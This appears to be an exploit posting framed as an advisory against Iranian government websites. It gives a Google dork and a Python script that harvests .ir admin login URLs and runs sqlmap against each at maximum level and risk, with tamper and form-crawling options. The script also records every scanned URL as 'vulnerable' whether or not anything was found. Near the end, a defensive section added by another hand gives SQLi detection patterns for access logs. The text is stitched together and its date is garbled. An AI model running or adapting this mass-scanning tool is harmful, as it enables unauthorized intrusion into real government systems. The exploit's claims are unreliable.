*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
This advisory describes a security issue, and a method of attack, affecting a site owned by the government of the Islamic Republic of Iran: a SQL injection vulnerability (CWE-89).
We have repeatedly reported that this site has a security issue, and they have ignored our report.
We would like to file this security issue.
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
</>
Noobs study ready-made programs :))
We, the professionals, write a program that does all of this at once ;)
</>
/*!
- # VULNERABILITY: Website Iranian government admin find and Automatic Bypassing 0day attacker
- # Authenticated Persistent SQL injection
- # GOOGLE DORK: site:gov.ir admin login.php
- # DATE: November 12/09/2024
- # SECURITY RESEARCHER: E1.Coders
- # CWE: CWE-89
- # CVE: CVE-2024-9986
*/
### -- [ Info: ]
[i] A valid persistent SQL INJECTION vulnerability was discovered in the Iranian GOV website.
[i] Vulnerable parameter(s): - gov.ir admin login.php
### -- [ Impact: ]
[~] Malicious SQL code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
### -- [ Details: ]
[~] vulnerable file is "login page" and "Query sql inj attack"
### -- [ EXPLOIT : ]
import subprocess
import requests
from bs4 import BeautifulSoup
import time
import os
def google_search(query):
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'}
google_url = f'https://www.google.com/search?q={query}'
try:
response = requests.get(google_url, headers=headers)
response.raise_for_status()
return response.text
except requests.exceptions.RequestException as e:
print(f"Error while fetching Google search results: {e}")
return None
def extract_iranian_urls(search_results):
soup = BeautifulSoup(search_results, 'html.parser')
links = []
for a_tag in soup.find_all('a', href=True):
link = a_tag['href']
if "http" in link:
if ".ir" in link:
links.append(link)
return links
def run_sqlmap(url):
try:
sqlmap_path = 'K/Кодировщики/КАРТА ПАМЯТИ/sqlmap.py'
command = [
'python',
sqlmap_path,
'-u', url,
'--batch',
'--level=5',
'--risk=3',
'--threads=4',
'--output-dir=output',
'--flush-session',
'--tamper=between',
'--technique=BEUSTQ',
'--forms',
'--crawl=2',
'--random-agent',
]
subprocess.run(command, check=True)
print(f"SQLMap execution completed for {url}")
except subprocess.CalledProcessError as e:
print(f"Error occurred while running sqlmap on {url}: {e}")
def save_vulnerable_url(url):
with open("aaaa.txt", "a") as file:
file.write(f"Vulnerable URL: {url}\n")
print(f"Vulnerable URL saved: {url}")
def main():
google_dork = "site:gov.ir admin login.php"
print(f"Searching for: {google_dork}")
search_results = google_search(google_dork)
if search_results:
urls = extract_iranian_urls(search_results)
print(f"Found {len(urls)} Iranian URLs. Testing for SQL Injection...")
for url in urls:
print(f"Running SQLMap on {url}...")
run_sqlmap(url)
save_vulnerable_url(url)
time.sleep(5)
if __name__ == '__main__':
if not os.path.exists('output'):
os.makedirs('output')
main()
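Seen from the defending side, the scan configuration above (`--tamper=between`, `--technique=BEUSTQ`, `--random-agent`) cannot be filtered by User-Agent, but it still leaves SQL-shaped values in request parameters. The following is an added detection example, not part of the original advisory: it flags clients in a web access log by decoded parameter content; the log lines, the patterns chosen and the `min_hits` threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /admin/login.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /admin/login.php?id=1%20AND%204821%20BETWEEN%204821%20AND%204821 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2025:10:00:02 +0000] "GET /admin/login.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL HTTP/1.1" 200 498 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2025:10:00:02 +0000] "GET /admin/login.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.20 - - [01/Jan/2025:10:03:10 +0000] "GET /search.php?q=books+between+2010+and+2020 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.20 - - [01/Jan/2025:10:03:15 +0000] "GET /admin/login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# client IP, method, request target
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} ')

# Shapes that show up in decoded parameter values during automated SQLi testing.
SQLI_RE = re.compile(
    r"\bBETWEEN\s+\S+\s+AND\b"          # comparison rewritten by the 'between' tamper
    r"|\bUNION\s+(?:ALL\s+)?SELECT\b"   # UNION-based technique
    r"|\b(?:SLEEP|BENCHMARK)\s*\(",     # time-based technique
    re.IGNORECASE,
)

def suspicious_clients(log_text, min_hits=3):
    """Return {ip: [(path, parameter), ...]} for clients with >= min_hits matches."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, _method, target = m.groups()
        parts = urlsplit(target)
        # parse_qsl URL-decodes names and values, so %20 and + become spaces
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if SQLI_RE.search(value):
                hits[ip].append((parts.path, name))
                break  # count each request once
    # A single match can be an ordinary search phrase; repeated matches are not.
    return {ip: found for ip, found in hits.items() if len(found) >= min_hits}

if __name__ == "__main__":
    for ip, found in suspicious_clients(SAMPLE_LOG).items():
        print(ip, len(found), "suspicious requests:", sorted(set(found)))
```

Because `--forms` also submits POST bodies, which a standard access log does not record, the same matching has to run on request bodies at the application or WAF layer to see those probes.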
### -- [ Contacts: ]
[+] E-Mail: E1.Coders@Mail.Ru
[+] GitHub: @e1coders